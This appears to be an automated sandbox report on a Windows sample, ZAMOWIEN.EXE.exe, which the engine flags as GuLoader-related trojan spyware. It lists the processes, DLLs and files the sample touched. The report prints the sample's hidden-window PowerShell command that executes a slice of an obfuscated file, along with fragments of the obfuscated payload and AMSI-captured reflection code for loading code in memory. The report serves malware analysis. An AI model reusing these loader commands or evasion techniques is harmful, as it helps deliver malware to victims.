Windows Analysis Report
ZAMOWIEN.EXE.exe

Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Code function: 0_2_00404806	0_2_00404806
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04BDE3E0	2_2_04BDE3E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0785CFFE	2_2_0785CFFE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00394A58	12_2_00394A58
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00394188	12_2_00394188
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00399459	12_2_00399459
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00393E40	12_2_00393E40

Source: ZAMOWIEN.EXE.exe, 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamebasta.exe4 vs ZAMOWIEN.EXE.exe
Source: ZAMOWIEN.EXE.exe	Binary or memory string: OriginalFilenamebasta.exe4 vs ZAMOWIEN.EXE.exe

Source: ZAMOWIEN.EXE.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@17/10@2/2

Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe

Code function: 0_2_004042CA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004042CA

Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe

Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,

0_2_00402036

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4040:120:WilError_03

Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe

File created: C:\Users\user~1\AppData\Local\Temp\nsx1DFF.tmp

Source: ZAMOWIEN.EXE.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe

File read: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe

Source: unknown	Process created: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe "C:\Users\user\Desktop\ZAMOWIEN.EXE.exe"
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior

Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe

File written: C:\Users\user\AppData\Local\Temp\Cloud Setting.ini

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Found suspicious powershell code related to unpacking or dynamic code loading

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1680629547.000000000776D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Gy enTOutagu UdflnShephnPraeseMaxinlForere SarcdRaffl Grund'Vibre2KommaA Repu6,idgy3Utila6 entlFObscu6 FalcDDragg7TommeCUpcry6Telef1Multi6U aknD.atac6 und.2 xcer6Mi liFSdigh6AcadeA forr6Labo 1Sk iv7BjeliBVan k7N.nshD A rs2,oshv0Frds 4Me trARestr6DemimBTrans6.ndkv8Stvfr6Chefm7Ene r6Bitte0Fenci6StudiBAfh p4No,bl3Gestn6AtredB,pend7rat nA Rad,6Poten6Unrep6Ell g1 Filt6 mpulA Vid 2Regal6De on2K mfeASpred4EncumFCombi6AcptrDSterl6Lovl BGeni 3noncoFStego3Dokum9Kahyt3SysteANgend2K,lkv2 sych2SympaE Momi2 Ska ATr.ga5EksilA Afma7UsualCOp ag6Troch7Espyi6GenbrD Mart6Ddsma6Cytos6Crans1 Un a6 Outb0Lysed6Rain 1Te.ni7 radADipri6 in e7Hu,ha6B,falAD.sin2A,tik2Advar2taxieELogfi2ByggrAste h5pro.eCBrok 6V,lgaFSik e7FanatE Afsk7MetatA ,ncl7PassiBSai y7 impeD Inca7Str.pDBestr6Ha buBFourf7SpiseCRicin6Asthm0beli 6FrateBobscu7O.rroDBirle2 Fest2Parr 2Haan.ESluto2GgebgAKunst5Fa tlBMikro6Rei fASprit6Choic9Thi,a6HindeFindda6 MidtF Bill6SteerBMilli6CourgAHjemm6KlikdB Hexa3min.rFDepr 3 NonsE Magn3Ra he6 Deox2 Pro,7Glome2Terah0 Ambs5ByggeDVulne6 GeneBgc ll7GenneAphilt4Under7enca 6Halvf3Deka 7CigarESlagt6Ma.ag2Mealy6AutocBSk pt6Stigm3Ergot6MathfB Octy6Infek0scrol7 lusA Over6 FyrrFAlbge7til yARes i6 Noni7Un ou6 Cang1 Opp,6Til,n0 drin4 Mo.a8Sawto6Ansku2Aliso6Pai.lFUpcas6Hflig9saute7DevolD.askv2Te,tr6Sprin2 PromATempo4Afses8bibli6 Barb7Spekt7 tilsCSandh6Flung3Skuff6FrerhFGesim7PseudDF ugt7OverfA Pate7Filch7Eleve7 Em.aCBemrk6 Kip,7 port6 B.dg0Le is6Grns 9livmo2Behoe7Opraa'Rootc But e1 Unse source: powershell.exe, 00000002.00000002.1678420817.000000000625E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1678420817.00000000060B1000.00000004.00000800.00020000.00000000.sdmp, Rapses.Arb.0.dr
Source:	Binary string: tem.Core.pdbST< source: powershell.exe, 00000002.00000002.1684612669.0000000008A80000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: qm.Core.pdbST source: powershell.exe, 00000002.00000002.1684612669.0000000008A80000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000002.00000002.1686392459.000000000C60C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Lovkyndiges $Trasseres $Sidelayout), (Jonbytnings @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tectibranchiate = [AppDomain]::CurrentDomain.GetAssemblie
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Reklamerende)), $Genear).DefineDynamicModule($Alfaderlige, $false).DefineType($Vanquish, $transversion, [System.MulticastDelegate])$ma

Suspicious powershell command line found

Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)"
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)"			Jump to behavior

Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe

Code function: 0_2_00405EA7 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405EA7

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04BDCE8A push eax; mov dword ptr [esp], edx	2_2_04BDCE94
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04BD6905 push 006BC3DCh; ret	2_2_04BD690A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0785C35C push eax; ret	2_2_0785C35D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0785944E push esp; ret	2_2_0785944F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0785945B push esp; ret	2_2_0785945C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_09340BF0 push edx; retf	2_2_09340C0A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_09340C10 push edx; retf	2_2_09340C1A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_09340FA0 push eax; ret	2_2_09341351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0934135D push esi; retf	2_2_0934135E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_093413E9 push esi; retf	2_2_093413EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_093413C9 push esi; retf	2_2_093413CE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_09341401 push esi; retf	2_2_09341406

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.EXE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
